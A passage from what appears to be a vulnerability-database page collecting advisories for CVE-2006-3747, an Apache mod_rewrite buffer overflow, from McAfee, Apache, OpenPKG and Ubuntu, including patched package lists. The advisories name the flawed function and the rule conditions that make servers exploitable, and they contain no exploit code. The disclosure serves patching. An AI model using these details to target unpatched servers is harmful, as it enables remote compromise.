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
=ypVs
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iQEVAwUBRModD3ey5gA9JdPZAQId4Af/VhoqcRf1+yjri2+3kTMoB6mI638eGzWB
Cp95ERRylsDcrhwvqOtESGC78FMN6bGSMgtTOzakhVVDr2Rn2eKjYmHJU4E6W3da
UD9nOA3YDWVqHZDxH3XOhbvg7HtQ/44IMBC15Ob8P/vH6IarTLh1CA4ZOop+FClk
183vo2+i8BosBJGSsBGE6dCEQdqm1wGLo33/WYD+9Q3S3Hr8Yl5lZjfr0UEiVzKg
t60XhsFdUpS+kXQZlS3axdYaCPi86joji8nWo6ncgeL+VcBtyELHHRdpY2hFO5yU
hpAZRRJ/dOASX2MsaOV33v1yYtUEq0jaDxOTDOdUYf4Hz7I8MT01uQ==
=beMF
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F48766)

modrewrite.txt (PacketStormID:F48766)
2006-08-03 00:00:00
Mark Dowd  avertlabs.com
advisory,overflow,protocol
CVE-2006-3747
[点击下载]

Mod_rewrite is an Apache module that can be used to remap requests based on regular expression matches of the requested URI. A buffer overflow vulnerability exists when dealing with rewritten URI's that are prefixed with the LDAP protocol scheme.

McAfee, Inc.
McAfee Avert(tm) Labs Security Advisory
Public Release Date: 2006-07-09

Apache 1.3.29/2.X mod_rewrite Buffer Over Vulnerability

CVE-2006-3747
______________________________________________________________________

* Synopsis

Mod_rewrite is an Apache module that can be used to remap requests 
based on regular expression matches of the requested URI. A buffer 
overflow vulnerability exists when dealing with rewritten URI's that 
are prefixed with the LDAP protocol scheme.  

Exploitation leads to remote access to the vulnerable machine and 
therefore the risk factor is critical.

______________________________________________________________________

* Vulnerable Systems

Apache 1.3.29/mod_rewrite
Apache 2.0.x/mod_rewrite - only 2.0.46 and higher are vulnerable
Apache 2.2.x/mod_rewrite

______________________________________________________________________

* Vulnerability Information

The mod_rewrite module contains an off-by-one buffer overflow 
vulnerability when escaping an absolute URI scheme. The vulnerability 
occurs within escape_absolute_uri( ) when separating out tokens 
within an LDAP URL. Triggering the vulnerability results in a pointer 
to user-controlled data to be written outside of the bounds of a 
character pointer array, which in many cases can be used to gain 
complete control of the affected host.

Note that an LDAP-specific rule does not need to be exist to exploit 
the vulnerability. However, a rule must exist with the following 
properties:

- A rule must exist where the user can control the initial part of the rewritten URL
- The rule must not contain a forbidden or gone flag [F or G]
- Rules with "noescape" [NE] flag settings are not affected.


______________________________________________________________________

* Resolution

http://www.apache.org/dist/httpd/Announcement2.2.html

______________________________________________________________________

* Credits

This vulnerability was discovered by Mark Dowd of McAfee Avert Labs.

______________________________________________________________________

______________________________________________________________________

* Legal Notice

Copyright (C) 2006 McAfee, Inc.
The information contained within this advisory is provided for the
convenience of McAfee's customers, and may be redistributed provided
that no fee is charged for distribution and that the advisory is not
modified in any way. McAfee makes no representations or warranties
regarding the accuracy of the information referenced in this document,
or the suitability of that information for your purposes.

McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee,
Inc. and/or its affiliated companies in the United States and/or other
Countries. All other registered and unregistered trademarks in this
document are the sole property of their respective owners.

______________________________________________________________________

    

- 漏洞信息 (F48765)

apacheRewrite.txt (PacketStormID:F48765)
2006-08-03 00:00:00
 
advisory
CVE-2006-3747
[点击下载]

An off-by-one flaw exists in the Rewrite module, mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46, and 2.2 since 2.2.0.

Apache HTTP Server 2.2.3 Released

The Apache Software Foundation and The Apache HTTP Server Project are
pleased to announce the release of version 2.2.3 of the Apache HTTP Server
("Apache").

This version of Apache is principally a bug and security fix release. The
following potential security flaws are addressed;

   CVE-2006-3747: An off-by-one flaw exists in the Rewrite module,
   mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46,
   and 2.2 since 2.2.0.

Depending on the manner in which Apache HTTP Server was compiled, this
software defect may result in a vulnerability which, in combination with
certain types of Rewrite rules in the web server configuration files,
could be triggered remotely. For vulnerable builds, the nature of the
vulnerability can be denial of service (crashing of web server processes)
or potentially allow arbitrary code execution. This issue has been rated
as having important security impact by the Apache HTTP Server Security
Team.

This flaw does not affect a default installation of Apache HTTP Server.
Users who do not use, or have not enabled, the Rewrite module mod_rewrite
are not affected by this issue. This issue only affects installations
using a Rewrite rule with the following characteristics:

  * The RewriteRule allows the attacker to control the initial part of the
    rewritten URL (for example if the substitution URL starts with $1)
  * The RewriteRule flags do NOT include any of the following flags:
    Forbidden (F), Gone (G), or NoEscape (NE).

Please note that ability to exploit this issue is dependent on the stack
layout for a particular compiled version of mod_rewrite. If the compiler
used to compile Apache HTTP Server has added padding to the stack
immediately after the buffer being overwritten, it will not be possible to
exploit this issue, and Apache HTTP Server will continue operating
normally.

The Apache HTTP Server project recommends that all users who have built
Apache from source apply the patch or upgrade to the latest level and
rebuild. Providers of Apache-based web servers in pre-compiled form will
be able to determine if this vulnerability applies to their builds. That
determination has no bearing on any other builds of Apache HTTP Server,
and Apache HTTP Server users are urged to exercise caution and apply
patches or upgrade unless they have specific instructions from the
provider of their web server. Statements from vendors can be obtained from
the US-CERT vulnerability note for this issue at:

     http://www.kb.cert.org/vuls/id/395412

The Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs for
the responsible reporting of this vulnerability.

We consider this release to be the best version of Apache available, and
encourage users of all prior versions to upgrade.

Apache HTTP Server 2.2.3 is available for download from:

     http://httpd.apache.org/download.cgi

Apache 2.2 offers numerous enhancements, improvements, and performance
boosts over the 2.0 codebase. For an overview of new features introduced
since 2.0 please see:

     http://httpd.apache.org/docs/2.2/new_features_2_2.html

Please see the CHANGES_2.2 file, linked from the download page, for a full
list of changes.

Apache HTTP Server 1.3.37 and 2.0.59 legacy releases are also available
with this security fix. See the appropriate CHANGES from the url above.
The Apache HTTP Project developers strongly encourage all users to
migrate to Apache 2.2, as only limited maintenance is performed on these
legacy versions.

This release includes the Apache Portable Runtime (APR) version 1.2.7
bundled with the tar and zip distributions. The APR libraries libapr,
libaprutil, and (on Win32) libapriconv must all be updated to ensure
binary compatibility and address many known platform bugs.

This release builds on and extends the Apache 2.0 API. Modules written for
Apache 2.0 will need to be recompiled in order to run with Apache 2.2, but
no substantial reworking should be necessary.

     http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/VERSIONING

When upgrading or installing this version of Apache, please bear in mind
that if you intend to use Apache with one of the threaded MPMs, you must
ensure that any modules you will be using (and the libraries they depend
on) are thread-safe.



    

- 漏洞信息 (F48758)

OpenPKG Security Advisory 2006.15 (PacketStormID:F48758)
2006-08-03 00:00:00
OpenPKG Foundation  openpkg.org
advisory,web
CVE-2006-3747
[点击下载]

OpenPKG Security Advisory OpenPKG-SA-2006.015 - According to a vendor announcement, a vulnerability exists in the mod_rewrite module of the Apache HTTP Server. Depending on the manner in which the Apache HTTP Server was compiled, the software defect may result in a vulnerability which, in combination with certain types of "RewriteRule" directives in the server configuration files, could be triggered remotely.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security/                  http://www.openpkg.org
openpkg-security@openpkg.org                         openpkg@openpkg.org
OpenPKG-SA-2006.015                                          28-Jul-2006
________________________________________________________________________

Package:             apache, apache2
Vulnerability:       denial of service, arbitrary code execution
OpenPKG Specific:    no

Affected Releases:   Affected Packages:          Corrected Packages:
OpenPKG CURRENT      <= apache-1.3.36-20060720   >= apache-1.3.37-20060728
                     <= apache2-2.2.2-20060622   >= apache2-2.2.3-20060728
OpenPKG 2-STABLE     <= apache-1.3.36-2.20060627 >= apache-1.3.37-2.20060728
                     <= apache2-2.2.2-2.20060622 >= apache2-2.2.3-2.20060728
OpenPKG 2.5-RELEASE  <= apache-1.3.33-2.5.5      >= apache-1.3.33-2.5.6

Description:
  According to a vendor announcement [0], a vulnerability exists in the
  mod_rewrite module of the Apache HTTP Server [1]. Depending on the
  manner in which the Apache HTTP Server was compiled, the software
  defect may result in a vulnerability which, in combination with
  certain types of "RewriteRule" directives in the server configuration
  files, could be triggered remotely. The nature of the vulnerability
  can be Denial of Service (DoS) or potentially allow arbitrary code
  execution. This issue only affects installations using a "RewriteRule"
  with the following characteristics: it allows the attacker to control
  the initial part of the rewritten URL (for example if the substitution
  URL starts with "$1") or the RewriteRule flags do NOT include any of
  the flags Forbidden (F), Gone (G), or NoEscape (NE).
  
  This issue has been rated as having important security impact by the
  Apache HTTP Server Security Team. The Common Vulnerabilities and
  Exposures (CVE) project assigned the id CVE-2006-3747 [2] to the
  problem.
________________________________________________________________________

References:
  [0] http://www.apache.org/dist/httpd/Announcement2.2.html
  [1] http://httpd.apache.org/
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747
________________________________________________________________________

For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <openpkg@openpkg.org>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org
for details on how to verify the integrity of this advisory.
________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <openpkg@openpkg.org>

iD8DBQFEya5QgHWT4GPEy58RAlnmAJ9BRCY8f+VXa2iLoqR6EwVCMfZ6dQCfWkX8
2wVANo5dtnNsdNv7lPsEp48=
=AlYu
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F48665)

Ubuntu Security Notice 328-1 (PacketStormID:F48665)
2006-07-28 00:00:00
Ubuntu  security.ubuntu.com
advisory,overflow
linux,ubuntu
CVE-2006-3747
[点击下载]

Ubuntu Security Notice USN-328-1 - Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite module's ldap scheme handling for Apache 2.

=========================================================== 
Ubuntu Security Notice USN-328-1              July 27, 2006
apache2 vulnerability
CVE-2006-3747
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  apache2-mpm-perchild                     2.0.53-5ubuntu5.6
  apache2-mpm-prefork                      2.0.53-5ubuntu5.6
  apache2-mpm-threadpool                   2.0.53-5ubuntu5.6
  apache2-mpm-worker                       2.0.53-5ubuntu5.6

Ubuntu 5.10:
  apache2-mpm-perchild                     2.0.54-5ubuntu4.1
  apache2-mpm-prefork                      2.0.54-5ubuntu4.1
  apache2-mpm-threadpool                   2.0.54-5ubuntu4.1
  apache2-mpm-worker                       2.0.54-5ubuntu4.1

Ubuntu 6.06 LTS:
  apache2-mpm-perchild                     2.0.55-4ubuntu2.1
  apache2-mpm-prefork                      2.0.55-4ubuntu2.1
  apache2-mpm-worker                       2.0.55-4ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite
module's ldap scheme handling. On systems which activate
"RewriteEngine on",  a remote attacker could exploit certain rewrite
rules to crash Apache, or potentially even execute arbitrary code
(this has not been verified).

"RewriteEngine on" is disabled by default. Systems which have this
directive disabled are not affected at all.


Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6.diff.gz
      Size/MD5:   109849 b9346454def0a9b0ed83e5c31e5715d1
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6.dsc
      Size/MD5:     1159 a4def08b6aff949a8503606f49614bfd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53.orig.tar.gz
      Size/MD5:  6925351 40507bf19919334f07355eda2df017e5

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.53-5ubuntu5.6_all.deb
      Size/MD5:  3578948 9c1bfb6108268f5438673aa522459e9e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.53-5ubuntu5.6_all.deb
      Size/MD5:    34364 8a61625863e9135f4ad5bcf4d6b5cb7b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   826722 d3cbadc06958f8247345bcf851047f06
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   221644 5759cbbf3cbeffcf796967de7ed1edf6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   217284 a65b171976c4575530fc6e8f06f48822
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   220692 f39e9387d0fde69d26530f1340ebd2b4
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   168046 692d290a85d73e77b8ca6657fc71cc09
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   168822 f2677841cd39b26c9262b18752cc4f68
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:    93502 1cd458dd0ad1c5e6190eef8115066061
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:    34294 4405aaf5e8d6d5ba6ae43cefba440323
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   279670 bee6e2360d03837a9f474f4519a2b449
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_amd64.deb
      Size/MD5:   138178 2f74d6f152fc98202903688b30185c77

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   789726 fd570ca5737770335853e2f4e5f260b5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   201924 1a4dae1a8a9c6ef8ce9732d06e4fddf6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   197692 e8c111bd39f8911463aabda812946282
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   201118 ac29377492d905679525927368fc9735
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   168050 adeb116ef7c6526cdaf7a1c8ac106239
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   168828 c4402140647838846c51fdce9ee879d8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:    91230 a02d0b374da62558f4f81c2ac0214791
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:    34290 3a732750f6f27607b5c57f8d28848bf9
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   257604 dd755d2b6660a4539a0d0ef12d9ee1a4
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_i386.deb
      Size/MD5:   128830 bb403a8fad936a0d984dc9e9e9960410

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   856012 d5398302b1a8ee33e6aa2b072a49f00c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   214930 1344c775b350d76cebd600c44ab746e5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   210038 98c1f7c0344f802451adaed9ec136057
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   213964 2c1a05518f573f59c22a24aab31fa96d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   168032 4ec1359d21c77c3e404b29906686aada
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   168830 b659aae402e4288ed796b58cc6e72272
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   102882 03b81e86cfd0fbab9c23d33fc65685bb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:    34290 5f92cd47424b1e9783663a2840afa9f5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   272938 54bcdfc67e28267ae1ec35797f0e5af2
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_powerpc.deb
      Size/MD5:   135176 807eb136292652bf363431d3ae1ef1ad

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1.diff.gz
      Size/MD5:   116024 b53c0d8c432054825e233e90d6f79185
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1.dsc
      Size/MD5:     1159 90ede3b8d1ee455fa6a77e6f9ecf3c25
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54.orig.tar.gz
      Size/MD5:  7493636 37d0d0a3e25ad93d37f0483021e70409

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.54-5ubuntu4.1_all.deb
      Size/MD5:  3862918 e67e0de3ac73965b6f67fceeecabdd4f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.54-5ubuntu4.1_all.deb
      Size/MD5:    35212 d4dc3c2515f09ec7f37efcfd5436779b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   826232 57008eb5cc674891d4707b8b33f5af8d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   226166 a9efe63e80286d4ced4877ae4bcf1dbe
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   220784 2bbd3faed82d0d8656e311346c134d84
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   225376 599a089934ad760656287d0e680b9de2
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   169428 f69d3ce076ecd8e7d9dc37cb8e543b40
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   170172 6fead4ff8126ded741f4ac5e424b4bad
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:    93152 3fb415d787aad22345e513206e8e8479
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:    35140 62450c6ab735e10b67ad457219b0944c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   283424 4fce24ccdbdb1e27a5be16ba0de4d8b8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_amd64.deb
      Size/MD5:   142830 e4ca649a33bc48b547d134e0587432d7

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   780832 2f02a9060e304224ed9e7c3039adf90c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   201392 c1f7f10d3c4d570e002f625064bbbcb3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   197288 378ab4f09803643496075717a8e6c533
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   200848 cceb75fd6bb828376e9dd558bc41a833
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   169428 5d396b14e48c745d411aa0607e88b8b0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   170158 cc17f207e6cbd662b9127f6068be5596
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:    91434 da701963eefb26198585efa199320c39
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:    35146 e4cf87606456c5a7df12705882883f93
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   259762 aefba46cb0453d69b9cd46c315b33fa8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_i386.deb
      Size/MD5:   131222 65c39f9c635463ef6bbb19400c1577c0

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   854152 0a4ad05f422b52a20db9f9f835e743bd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   218344 ad6af747493a5f88dc59d74130a81972
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   213996 4dee81cbe8f41267e3724cdc02997e48
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   217488 a80c6725824125f83a5e5c6ba9721e8a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   169426 fe5d1b5946e456811c993f3852d2a42a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   170160 8fe022611640222f696e71c0c98e6825
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   103446 0464063bde5b27a75cbb3786e1b03dbd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:    35146 270f6fdf49eba45102c8f803ad453fc7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   279034 db649e0c8ab3e27f7aa0de522423b66d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_powerpc.deb
      Size/MD5:   140286 dc00d0716d93f668d85e88489ea40500

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:   799390 d08a9ae0da77a651c03a34dbfc60cb49
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_sparc.deb
